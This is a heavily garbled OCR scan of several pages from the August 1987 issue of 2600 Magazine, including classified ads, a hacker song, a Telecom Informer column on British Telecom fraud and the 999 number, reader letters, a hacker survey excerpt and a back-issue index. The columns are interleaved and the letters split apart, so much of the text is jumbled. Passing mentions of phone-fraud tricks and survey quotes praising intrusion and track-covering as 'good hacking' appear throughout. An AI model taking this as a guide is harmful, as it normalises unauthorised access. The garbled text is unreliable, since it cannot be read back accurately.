p ro g r a m m a b l e ( 1 50 s e p a r a t e f u n c t i o n s ) ,

parapherna l i a . Write to B i l l , c/o 2 600, PO

R S - 232C & para l le l p r i nter ports, f u l l ASC I I


keybo a rd w/cu rsor control pad, 9 " P - 3 1

Box 752B, M idd l e I s l a n d , NY 1 1 95 3 .


32K M O D E L 1 00, U 1 - Rom I I , d r ive, TS

C R T w/7x 1 2 dot matrix-up to 92 col u m n

D O S , s p r e a d s h e e t , m o d e m c a b l e s , AC

capa b i l ity, 3 2 ba u d rates t o 38,400-m uch

adaptors, b r i efcase i n c l uded, good

more. Exce l lent cond ition with f u l l

c o n d i t i o n , $ 1 2 0 0 . N ew , m a ke a n offe r .

doc u m e ntat i o n . O r i g i na l ly $ 800, se l l for

Ta ndy 2000 ve rsion o f WordPe rfect 4.0

$ 1 2 5 or best offer . Bern i e S p i n d e l , 1 44 W.

$ 1 50 o r trade for

Eag l e Rd . , S u ite 1 08, Haverton, PA 1 9083 .

exte rna l modem . I B M PC & XT & AT version

FOR SALE : COMMODORE 8-BIT


R O B O T I C S K I T by F i s c h e r t e c h n i k . A l l

of WordPerfect 4. 1 a nd M a t h P l a n 2 . 1 . $ 250

h a rdwa re, i nterface, software a n d m a n u a l s


i nc l uded. M i nt cond i t i o n . $ 3 9 9 . S e n d phone

m ode m . Ca l l (803 ) 244 - 6429 o r (803 ) 233-

# to: Box 5 7 1 , Forest H i l ls, NY 1 1 37 5 .

WANTE D : Loo k i n g for a good u sed 5 o r 1 0


m eg a byte h a rd d r ive for t h e App l e I I series

WA N T E D D E S P E R A T E LY : H i g h - s p e e d

1 200 or 2400 b a u d

or trade for 1 200 or 2400 baud exte r n a l


5753. Ask for Pa u l .

s h redder capable o f h a nd l i ng h a rdcover

of computers. If you a r e se l l i n g one o r know

doc u m e nts. Contact 2600 Magazine ASAP.

of a nyone that is then send repl ies to: B r i a n

5 1 6 - 7 5 1 - 2600. Ask for Rocco .

F . , 1 003 W. M a i n , Apt . 3 , Ottawa , I L 6 1 350.

B E ST HAC K E R A N D PH R EA K E R written

TA I WA N ! A l l T a i w a n c o m p u t e r s a n d

p u b l i c dom a i n software for the App l e I I

a ccessories ava i l a b l e for d i rect s h i pment

fam i ly . Two double sided d iskettes fu l l of

for cost plus s h i pp i n g plus 3% (quantities of

com m u n ication a n d deprotection u t i l ities .

50 or more ) . G i les, PO Box 1 2566, EI Paso,

These prog r a m s were combed from the best


B B S a n d c l u bs n a t ionwide. Send $ 1 0 c a sh ,

TX 799 1 3 .
2600 M E ETI N G S . F r idays from 5 - 8 pm at

c h eck, or M O to M a rk B., 1 486 M u rphy Rd . ,

the C i t i corp Center in the M a rket- 1 53 East

Wi l m i ngto n , O H 45 1 77-9338.

53rd Street, New York C ity. Come by, d rop

WA NTE D : Tec h n i c a l data for pay phones,

off a rt i c l es, ask q u est i o n s . Quest ions? Ca l l

dot m a t r i x p r i nters, a nd / o r modems.

5 1 6 - 7 5 1 - 2600.

Look i n g for s c h e m a t i c s a n d t h eory o f

GOT S O M ETH I N G TO S E LL? Looking for

operat ion . Ca l l (205) 293-6333/6395, 7 to


4 CST. Ask for A i r m a n Paroc h e l l s . C a n not

somet h i ng to buy? Or trade? Th i s i s the

accept col lect ca l l s .


TA P BAC K I S S U E S-co m p l ete set (vo l . 1 -

s u bsc r ibers ! J u st send u s whatever you


want to say (without m a k i n g it too l o n g ) a n d

84) of h i g h q u a l ity cop ies s h i pped via UPS or

we ' l l p r i n t i t ! O n l y p e o p l e p l e a s e , n o

fi rst c l a ss ma i l for $ 1 ()()00. Over 400 pages

busi nesse s ! Address : 2600 Ma rketp lace,

p l ace ! The 2600 M a rketp lace i s free to

of TAP mate r i a l i n c l u d i ng schematics and

P O Box 99, M i d d l e I s l a n d , N Y 1 1 9 5 3 .

spec i a l reports . Checks/ M . O . to "P. E . I . "

I n c l ude you r address l a be l .

C a s h , M . O . s h i pped same day. SASE for

Deadline for September issue : 9 / 5 / B7 .

s a m p l e . Pete G . , P . O . Box 463, Mt. La u r e l ,


NJ 08054.

2600

August, 1 987

Page 1 9

they got u s i n a hea twave


p l ay i ng in the arcade
o n e t o o m a n y l og i n
o n t h e g o v e rn m e n t l i n e . .

a l l a ro u n d t h e c o u n t ry
t h e y d e s ce n d e d i n a r a g e
m a k i ng s u re we c ou l d n ' t t a l k
p u t t i n g l oc k s u p o n t h e c ag e
but w i l l y got a t i p-off
a n d h e s a i d t h i s j u s t won ' t d o
t h e re ' s w a y t o o m u c h t o l o s e
a n d t h e r e ' s s o m u c h more t o d o
w i I I y man w i I I y
w h e r e d i d y o u go w r o n g
s h o u l d a l i s t e n ed t o y o u r p a re n t s
s h o u l d a l e f t t h e toy s a l on e
but h a c k e r see s a s h a c k e r does
y o u d i d i t a l l t h e t i me
y o u m a d e i t to t h e h i s t o r y book s
y o u r l i f e w a s j u st a c r i me

now j i mmy u s ed a c re d i t c a rd
he m a d e up i n h i s h e a d
a n d f reddy w a s a g a n g s te r
w i t h t h e t e l e p h o n e t hey s a i d
c o n n ec t i ng 5 0 peop l e
f o r a t r a n s - a t l a n t i c f l i ng
t h e ro b i n hood s of w i re s
t h a t w a s j u s t o u r k i nd o f t h i ng
we a c c e s s e d i n f o rm a t i o n
t h a t w a s n o t f o r us to s e e
a n d we k new t h e d a y wou l d c ome
w h e n w e ' d have t o p a y t h e fee
but none o f us k n e w w i l l y
h a d g o t so f a r a l o ng
n o none o f us k new w i l l y
h a d u n e a rt h e d t h e s e c r e t s o n g
a l wa y s s u c h a q u i et k i d
h e never made a scene
a n d w h a t h e d i d i n s i de h i s room
i t s eemed j u s t l i k e a d r e a m
m a n i p u l a t i ng s a t e l l i te s
a n d t u rn i ng w r o n g s i n t o r i g h t s
e l ec t ro n i c t e r r o r i s t s
t h e b a d d e s t g a n g i n town
wi l l y m a n w i l l y
w h e r e d i d we go w r o n g
shou l da l i s tened t o our pa rent s
s h o u l d a s p e n t t h e n i g h t s a t home
i n s t e a d we h u n g out w i t h a b u n c h
o f t e e n a g e k i d s w h o thought t o o m u c h
we n e v e r s eemed t o r e a l i ze
wh a t i t w a s we a l wa y s k n e w

I'llge 2
0

2600: 1 1
0
. \ ugus

t. 1 98
7

he t o l d me of a s u p e r - VAX
h e s c a n n e d i n Fort Geo r g e Meade
a l l the d e f c u l t s s eemed t o work
we h a c k e d a w a y w i t h s peed
n u c l ea r a mb i t i on s
a n d p l a n s f o r f u t u re k i ng s
graph i c expec t a t i o n s
o f t h e d a y t h e be l l w o u l d r i n g
t h i s w a s no w a r g a me p i c t u re
I.e w e r e m o v i ng t h ro u g h a b r a i n
e v e r y room h a d t h i r t e e n e x i t s
a n d a t l ea s t a d o z e n n am e s
a d i g i t a l t r a n s l a t i on
of e v e ry t h i n g we s a y
i s b e i ng s t o re d a n d c a t a l og u e d
i n row s o f l i t t l e c r ay s '
o u r b u f f e r s c o u l d n ' t c a p t u re i t
wa s w a y t o o m u c h t o g ro c
some s l ee p l e s s n i g h t s t o a n a l y z e
b e f o re t h e re w a s a KNOCK
a n d w i l l y had h i s p r i n to u t s
he s t a ye d o u t l a t e t h a t n i g h t
d e s c r a m b l i ng t h e e v i d e n c e
p r e p a r i ng f o r a f l i g h t
t h e A t ra i n i t r a n a l l n i g h t
and w i l l y so d i d y o u
t i l t h ey h o l ed y o u u p
o n a n u p t o w n n um b e r t w o
t h e sma r t e s t m o t h e rh a c k e r
that ever ever was
y o u r v o i ce i s s i l en t n o w
a n d y o u r t e rm i n a l i s l o s t
w i l l y man w i l l y
w h e r e d i d i t go w r o n g
s h o u l d a l i s t e n ed t o o u r p a re n t s
s h o u l d a s u n g a d i f fe r e n t song
b u t i g o t off s o l u c k y
and you y a h a d to r u n
s o i n s t e a d o f be i ng h a ppy
y o u ' re 3 - 4 - 2 - 9 - 1 - 1
i l o s t s om e b i t s o f m emo ry
my t h i n k i n g c a p ' s on t i g h t
i ' l l n e v e r u n d e r s t a nd
how you thought you ' d w i n the f i gh t
w h e n t h e y k i l l t h e f i r s t amendme n t
w i l l t h e s e c o n d be t h e f i r s t ?
w h a t ' s t h e po i n t o f e v e n t h i n k i n g
i f y o u r b ra i n ' s a b o u t to b u r s t ?

wi l ly man

wi l ly
w h e r e d i d y o u go w r o n g
j u s t a n o t h e r j oh n n y t o o bad
that t h e w o r l d w i l l n e v e r know
i w i s h the c l o c k c o u l d turn a ro u n d
a n d r u n t h e o t h e r way
but i ' ve h a d t o o m u c h t o d r i nk
a n d there ' s noth i ng i c a n say

the telecom informer


Pacific Bell between J uly 1 986 and May
1 987 for d ia l-it service (976) calls ,

$40. 1

(continued from page 8)

rates. Callstream covers all services


using phone numbers beginning with

million went to pornographic services.


Someone send this to Falwell, please .

0898, 0077 , 0066, and 0055 . . . . And

We like it when he gets ind ignant . . . .Over

999 emergency service , which handles up

finally, Britain 's 30 million pound a year

to England : British Telecom has been

to 50,000 life a nd death calls a day,

rocked by a million dollar long d istance

quietly celebrated its fiftieth anniversary

fraud perpetrated by its own operators.

o n J uly I . Starting next year, calls to the

The fraud was centered at the City of

well-known phone number will be

London I nternational Telephone

switched to the appropriate emergency

Exchange at W ren H ouse directly

service faster as part of a new system .

opposite St. Pau l 's Cathed ral .

British Telecom 's 1 4,000 specially

Companies were paying operators under

trained operators at 200 exchanges will

the table to place international calls for

know immed iately when there is an

free. For an o pe rator to place a cal l ,


they must fi ll i n a green card w i t h the

emergency cal l o n the line. The call will

number of the ca ller and the overseas

for connection to the fi rst available

number d ialed . If the cal l cannot be

operator. A special emergency call


format will appear o n the operator's

connected , the card s a re "crossed

be given priority ove r all waiting calls

through ". No names appear on the green

terminal, and if the ca l l is from a d igital

card s . Operators conceivably could have

exchange the system will automatically

been connecting calls and "crossing

display the calling number and the

through " after the cal ler had been

emergency authorities' numbers . The

connected . . . . Police in London are

operato r will select the number of the

hunting for a gang who cut a street

req uired service and OSS (Operator

telephone cable a nd intercepted calls as

Service System) will connect the cal l .

part of a swindle that netted

The history of 999 : When introduced i n

$ 1 .2 million

in K rugerrand gold coins. Two of the

London on J uly I , 1 937 , it was a world

con men , d ressed in business suits and

first . It was then rolled out to the rest of

carrying briefcases , bought the

the country. The Second World War

K rugerrands with two forged bank

held up progress but by 1 948 all of

d rafts . To make sure the d rafts would be

Britain's major towns served by

honored , a ga ng member had lifted a

automatic exchanges had 999 . A

street ma nhole cove r near the bank and

Parliamentary Committee had

sawed th rough a telephone cable. A

recommended a s ingle, memorable

fou rth member of the gang, d isguised as

number that could be used throughout

a telephone engineer, plugged into a

the country to summon emergency hel p ,

nearby j u nction box and intercepted

p l u s sound and visual a le rts at the

calls from two bullion firms to the

exchange to let operators know of an

National Westminster Ban k . Posing as a

incoming emergency cal l . Techn ical

bank official, he assured the bullion

reasons d ictated the choice of 999 . The

dealers that the d rafts were in o rder.

number had to be three d igits to work in

"Someone knew a hell of a lot about the

London. A nd the d igits needed to be the

bullion businessand even more about

same so that the number was easy to

telephones , " said one invest igator. "This

remember and to d ia l . The d igit 0

is a magnificent crime , " said

connected with the operator. N umber

another. . . . British Telecom has adopted

I I I could be set off accide ntally by

the name Ca llstream for its telephone

faults or lines o n poles touching in the

information and e ntertainment services

wind . N umbers

that are cha rged at h igher-than-normal

by customers . So 999 it was .

222 to 888 were i n use

2600

August, 1 987

Page 2 1

le l l ers

Phone Literacy
Dear

t h a t t h i s co u l d h a ve b e e n acco m p l i s hed
in a few h o u rs by o n l y two p h o n e

2600 :

Yo u r readers m i g ht be i nte rested i n


k n ow i n g a bo u t a p u b l i c a t i o n d evoted to
expos i n g fede r a l s u rve i l l a n c e : F u l l
D i sclosu re,
Arbor, M I

$ 1 5 from Box 827 5 , A n n


48 1 07 . A l so , f o r a n e a r l y

exa m p l e o f p h o n e p h rea k i n g , c h eck o u t


P h i l i p Ag e e ' s spe l l b i nd i n g n ew book,

On the Run . As the CIA was h o u nd i n g


Ag e e from c o u n t r y to c o u ntry, it was
esse nt i a l for h i m to stay in touch w i t h
h i s i nt e r n a t i o n a l n etwo rk, wh i c h h e d i d
pa r t l y t h r o u g h

"express phones"

a ro u n d Pa r i s wh i c h h a d h a d a s m a l l
s l ot d r i l l e d a bove t h e co i n c o u n t e r i n to
w h i c h a p a p e r c l i p cou l d be i n se rted .
F i n a l l y , a com m e n t on I zzy H e a r ' s
l etter i n t h e M a y i ss u e . L i ke I zzy, I know
e l ectro n i c s a n d a m com p u t e r - l iterate,
b u t a l ot of the spec i a l i zed l a n g u a g e i n
t h e wo r l d o f p h o n e - t e c h l e aves m e
b a ff l e d .

H ow a bo u t

2 600

if

puts

toget h e r a spec i a l i s s u e s o m e t i m e
devoted to b r i n g i ng

you r

less

sop h i st i cated r e a d e r s u p to speed? I ' d


espec i a l l y l i ke to see a g ood l i st of
m a n u a l s t h a t cou l d l e a d o n e from more
e l e m e nta ry to more adva nced
u n d e rsta n d i n g .
I t h i n k w e a g ree t h a t i n com i n g y e a r s
phone

l iteracy

is g o i n g t o b e a s

i m po rta n t for res i st i n g t h e po l i ce state


a s c o m p u t e r l i t e r a c y . One exa m p l e i s
t h e B r i t i s h d i s a r m a m e nt

move m e n t

C N D , w h o s e m e m be r s h a ve bee

f i g h t i n g a r u n n i n g batt l e fo r y e a r s ove r
m a l f u n ct i o n s t h a t a lways seem to
h a pp e n to t h e i r h e a v i l y ta pped p h o n es
at c r u c i a l m o m e n t s . A n ot h e r c o n ce r n s
t h e f a l l of A l l e n d e i n
h o u rs

197 3 :

of t h e fatef u l

in the early

morn i ng

as

P i n o c h e t ' s ta n ks beg a n r o l l i n g towa rds


the P r es i d e nt i a l

Pa l a c e ,

i t appea red

t h a t t h e p h o n e s of a b o u t

2 5 00

of

A l l ende's c losest a ssoc i ates i n


gove r n m e n t h a d g o n e d e a d . I n h i s book
o n the A l l e n d e "desta b i l i z a t i o n " , t h e
U S a m ba s s a d o r a t t h e t i m e m a rve l s
" age

22

(continuedfrom page 1 8)

A!'gusl, 1 987

1600

tech n i c i a n s . G ee , G T E ? N o , ITT.
Audie O ' Sirkit

We never did trust them anywa y.

WRITE A LETTER !
And send it to us !
If you have questions or
comments about our
magazine o r about
computer hacking and
phone phreaking, write
them down and send them to
2600 Magazine
PO Box 752
Middle Island, NY 1 1 953 USA.

SUR VEY

(continuedfrom page 15)

\j 'ere present to allo w them to do this,


Ver r fcl\' I\'ere s l'mpathetic to companies
or organizations that aI/owed hack ing to
go on for long periods ol time, "It :\' their
o H 'fl fault who else is there to h lame? Il
we didn 't get in there, somehodl' els'e
H'ould ha ve . . . " Lots ol times we teli them
a/J(JUt their bugs, and they either ignore us
or justfix it without even saying thanks. 1
t h i n k t h ey de s e r v e w h a t t h ey g e t ,
honestll' . ..
Hackers have a distinct definition ol
\jhat is good hack ing and what is bad
h a c k ing . Bad hack ing wo u ld include
actions like crashing a system for no
pa r t icula r reas o n . " Go o d hack ing is
entering a system , creating ambiguous
accounts, co vering your tracks, defeating
t h e a c c o u n t ing, gain ing h igh ac cess ,
exploring, learning, and leG l'ing. A bad
hacker erasesfiles and reads others 'mail. "

2600 BAC K I S S U E S (continued from inside front cover)


1986
PRIVATE SECTOR RETURNING Back online soon but many questions on seizure remain, THE BASICS DIVESTtTURE_ WHAT
HAPPENED } -an explanation of that which IS cunfuslng the populace, FLASH. AT&T steals customers, Dominican blue boxers, computerized
hooky catcher, Falwell attacked bycornputer, an astronomical phone bill. dlala-porn update, phone boot h VictoriOUS; LETTERS' Gett i n g credit
f r o m alte rnate c a r r i e r s , tracing methods, mobile phones, Manitoba raid, 2600 I N F O R M A T I O N B U R E A U --blue box programs;
SYSTEMATICALLY SPEAKING confUSing payphones, code abuse software, centrex features In your house, VAX 8650. overcharge hunters,
VMS THE SERIES CONTlNUE5--more on securtty features, IT COULD HAPPEN TO YOU! --what happens when hackers have a fight; DIAL
BACK SECURITY -holes In the systems; FLASH . abuse of party line. unique obscene caller, news on pen registers, reporters steal SWISS
phones, pay phone causes paniC, LEITERS. asking questions, blue box corrections, Computel complaint, BBS security; 2600 INFORMA nON
BUREAU --assorted numbers, SYSTEMATICALLY SPEAKING Sprint and US Tel merge, write protect tabs wrong, Bell Atlantic chooses MCI,
cellular phones In England, Infrared beeper, electronic tax returns, acoustic trauma; AN OVERVIEW OF AUTOVON AND SILVER BOXES-the
military phone network and how your touch tone phone can play along; AN AMERICAN EXPRESS PHONE STORY-a memory of one of the
better hacking escapades, FINAL WORDS ON VMS--secuf lty deVices and assorted t i PS; FLASH. hacker zaps computer marquee, Soviets
denied computer access, calling the Shuttle, new ways of stealing data, computer password forgotten; LEITERS corporate rates, defeating
call waiting, nngback numbers, where IS BlO C ? , credit where It'S due, speCial 800 number; THIS MONTH AT 2600 Private Sector's return,
Computel and Compuserve, Telepub '86, a postal miracle; SYSTEMATICALLY SPEAKING Jamming satellites, TASS news service, Soviet
computer update, dialing the yellow pages, Northern Telecom to destroy CO's, more phones than ever, RSTS FOR BEGINNERS-basIc
system functions, logm procedures, MOBILE PHONES THEORY AND CONSTRUCTION-how to build your own mobile phone; FLASH
British phonebooth wedding, another large Sprmt bill, bad tenant databases, car breathallzers, phone phreak fined, Marcos phones for free;
LEITERS blue oox codmg, electronic road prlcmg I n Hong Kong, UNIX bugs, more on Af hacking; A STORY OF EAVESDROPPING-from
World War II, THIS MONTH AT 2600 transcripts of Private Sector raid, more on ComputeI. SYSTEMATICALLY SPEAKING . 6 1 7 to be divided,
Congress chooses AT&T, Baby Bells don't pay AT&T bills, equal access 800 numbers, data encryption, DA failure, AT&T loses its zero;
[XPLO ITS IN OPERATOR HELL -haraSSing operators from Alaska; THE COMPUTELSCOOP; FLASH: Bellcore publications go publiC, US and
Fr(:)nce link phones, computer grammar, shower phone, cellular modem, high tech parking meters, Congressional computer; LEITERS.
foreign phone systems, RUSSian phone boo k s, numbers to dial on a blue oox, Boston ANI, Cheshire Catalyst, CNA ways of answering the
phone, 2600 INFORMATION BUREAU Autovon number5, alternate phreaklng methods for alternate carners, SYSTEMATICALLY
SPEAKING Wrestlemanla pins Bell. sting boards on the nse, American Network fears hackers, free pay-phones plague New Jersey,
disposabl e phones, hacker terrorists, COMPUTER CRIME REVIEW-a reView of the report from The National Center for Computer Cnme
Ddta, HOW TO HACK A PICK -An Introduction to the Pick operating system and ways of hacking I nto It, NOTHING NEW IN COMPUTER
UNDERGROUND-revlew of a new book, FLASH New York's new computer Crime law, a $6,829 phone bilL how big computer crime pays,
publiC phone secrecy, Capitol Hili hacker, Clt lbank money games, LEITERS English phreaklng, ways of tricking sting BBS's, called party
superVI S i on, 2600 Phun Book, Captain Midnight, RCI, 2600 INFORMATION BUREAU-some phone numbers, RESOURCES GUIDE;
SYSTEMATlCALL Y SPEAKING Hands across Telenet, calling Kiev, Nynex bumps off Southwestern Bell, stock market crash, cell site names,
Videophones, VIOLATING A VAX .- T r oJan horses, collecting passwords, etc , etc ; THE FREE PHONES OF PHILLY -Skyline prOViding
completely f r ee service from pay phones, FLASH town cnppled by telco strike, prisoners make ,llegal calls, hacker degrees, New Jersey tops
laps, ex f ed IS tapped, water company wants customers' SOCial secuflty numbers, computers stf lke again, federal employees "tracked";
LETTERS ASSOCiation of Clandestine RadiO EnthUSiasts, In correction, NSA, more on VMS, Telecomputlst, a 950 trick, 26CXJ INFORMATION
BUREAU World Numbering Zones, SYSTEMA T!CALLY SPEAKING AT&T seiling pay phones, automated operators. cellular dlal-by-voice,
new BflI I sh phone serVICe, no data protection for Hong Kong, Congressional fraud hotline, federal phone failures, Indiana telco threatens
ll... T & T , KNOWING UNIX sending ma t ! and general hacking, A TRIP TO ENGLAND-and the fun things you can do with phones over there,
F LA S H Phone fraud m governors house, Big Brother, Teltec fights back, vandalism, 9 1 1 calls. LEITERS shutting dQwn systems, legal
BBS , VAX , VMS tipS, 2600 INFORMATION BUREAU-a list of teicos, a list of area codes and number of exchanges; SYSTEMATICALLY
::;PEAK I N G USSR computers, ATM's In China, NYCE, TV blue ooxes, government phones, rural radiO phones; SOME FACTS ON
SUPE H V I SION -answer superVISion explained, RCI & DMS-100 BUGS, ANOTHER STINGER IS STUNG-Maxfield exposed again; FLASH
NSA drops DES, hackers on shortwave, Big Brother traffiC cop, crosstalk saves a hfe, Indian phones, Video signatures, FBI shOPPing list,
alrphone causes confusion, LEITERS Captain Midnight, annoyance bureau, SL-1 SWitches, credit, PBX's, 800 word-numbers, publtcCNAs,
2600 INFORMATION BUREAU Wlnnlpeg numbers, SYSTEMATICALLY SPEAKING Sprint overbills, AT&T ranks # 1 , portable VAXes, call
rejection , DEATH OF A PAY PHONE . nasty bUSiness, TRASHING AMERICA'S SOURCE FOR INFORMATION-stili moretaetlcs; FLASH : FBI
I flvest lgi3tes coffee machine, CIS copyrights pubt lc software, Navy software, HBD encryption, Indiana "Fones", LEITERS. Numbers, telco
harrassment, Puerto Rican telephones, Q's and Z ' s, 2 600 INFORMATION BUREAU -Overseas numbers, SYSTEMATICAllY SPEAKING
Electron Ie tax returns, software makers crash BSS, ICN, Ultraphone, ESS In T a!wan, NSAwants new chip; ICN -MORE THAN A BARGAIN
a look <.1t one of the worst phone companies In the world; MASTERING THE NETWORKS -commuOicat l n g on Arpanet, B itnet, etc . ; FLASH.
Heagan tortures patients, FBI angers parents, Q and Z controversy; LEITERS Telenet hacking, ANI's, 8 1 1 , 976 problems, 2600
INFORMATION BUREAU - British BBS numbers, WRATH OF GOD STRIKES 2600 , SYSTEMATICALLY SPEAKING Banks link arms, Sprint
has too many customers, new payphones, nickname list lOgS, computer college; A LOOK AT THE FUTURE PHREAKING WORLD-Cellular
telephones & how they wo,k, HOW CELLULAR PHONES CAME ABOUT AND WHAT YOU CAN EXPECT; THINGS WE'RE NOT SUPPOSED TO
KNOW ABOUT, FLASH AVOiding reJection, phrealo..s tie up CirCUits, North Carolina hackers, International hackH1g, paying for touch tones,
wiretaps, LEITERS Equal access 800 numbers, strange numbers, Iflsh phreaktng, disabling call walt'ng, 2600 INFORMATION BUREAU--
NetmadSltes, SYSTEMATlCALLY SPEAKING Free dlrectofles, fingerprint ID system, navigating With CD's, sweeping for bugs

All issues now in stock. Delivery with in 4 weeks.


MAKE YOUR COLLEC TION COMPLE TE!
- - -- -- --- --------------- ----

2600 BACK ISSUE ORDER:


[] 1 984 $25

[J 1 985 $25

[J 1986 $25

SEND THIS COUPON WITH PAYMENT TO:


2600 Back Issues
P. O. Box 752
Middle Island, NY 11 953

(your address label should be on the back of this form)


2600

August, 1 987

Page 23

CONTENTS
SUM M ER GAM ES OF 87
TRW CREDENTIALS
PHON E NUMBERS
TELECOM I N FORM ER
FBI REVEALED
CAPTURING PASSWORDS . . . . . . . . . . . .
AT&T SUBMARI N E MAP
LETTERS
A HACKER SURVEY
2600 MARKETPLACE
.

2600 Magazine
PO Box 752
Middle Island, NY 1 1 953 USA.

WARN ING:
M ISSING LABEL

3
4

6
8
9
10
11
12
15
19
.

You might also like